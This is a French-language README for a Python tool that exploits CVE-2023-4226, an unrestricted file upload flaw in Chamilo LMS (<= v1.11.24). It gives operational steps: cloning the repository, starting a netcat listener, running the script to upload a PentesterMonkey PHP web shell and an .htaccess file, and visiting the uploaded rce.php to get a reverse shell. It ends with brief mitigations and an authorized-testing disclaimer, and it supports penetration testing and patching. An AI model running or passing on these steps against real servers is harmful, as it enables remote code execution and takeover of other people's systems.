
Vulnérabilité de téléchargement de fichiers sans restriction dans **Chamilo LMS** (<= v1.11.24).
Script Python qui automatise l'exploitation de CVE-2023-4226, une vulnérabilité de téléchargement de fichiers sans restriction dans Chamilo LMS (<= v1.11.24). Télécharge un web shell PHP basé sur PentesterMonkey et configure .htaccess pour obtenir une reverse shell. Plus de détails : Advisory de STAR Labs.
/main/inc/ajax/work.ajax.php, permettant une RCE.ch_sidrce.php avec l'IP et le port./main/work/work.php?cidReq=HW./main/inc/ajax/work.ajax.php pour télécharger rce.php et .htaccess./app/cache/rce.php).Python : requests, colorama.
pip install requests colorama
Fichiers : rce.php (PentesterMonkey, inclus dans le dépôt), .htaccess (généré par le script).
Réseau : IP et port pour l'écouteur (ex. nc -lvnp 4444).
Clone le dépôt :
git clone https://github.com/SkyW4r33x/CVE-2023-4226
cd CVE-2023-4226
Attribue les permissions d'exécution au script :
chmod +x CVE-2023-4226.py
Installe les dépendances :
pip install requests colorama
Démarre l'écouteur dans un terminal :
nc -lvnp 4444
Exécute le script :
./CVE-2023-4226.py
Saisis :
ch_sid.Accède au web shell pour lancer la reverse shell :
http://<chamilo>/app/cache/rce.php
Exemple : http://chamilo.local/app/cache/rce.php
Mets à jour vers Chamilo >= v1.11.26.
Nettoie les noms de fichiers.
Bloque le HTML dans disable_dangerous_file().
Ajoute dans .htaccess :
RedirectMatch 403 ^/main/inc/lib/javascript/bigupload/files
Header set X-Content-Type-Options nosniff
Utilisation exclusive pour tests autorisés. Toute utilisation non autorisée est illégale.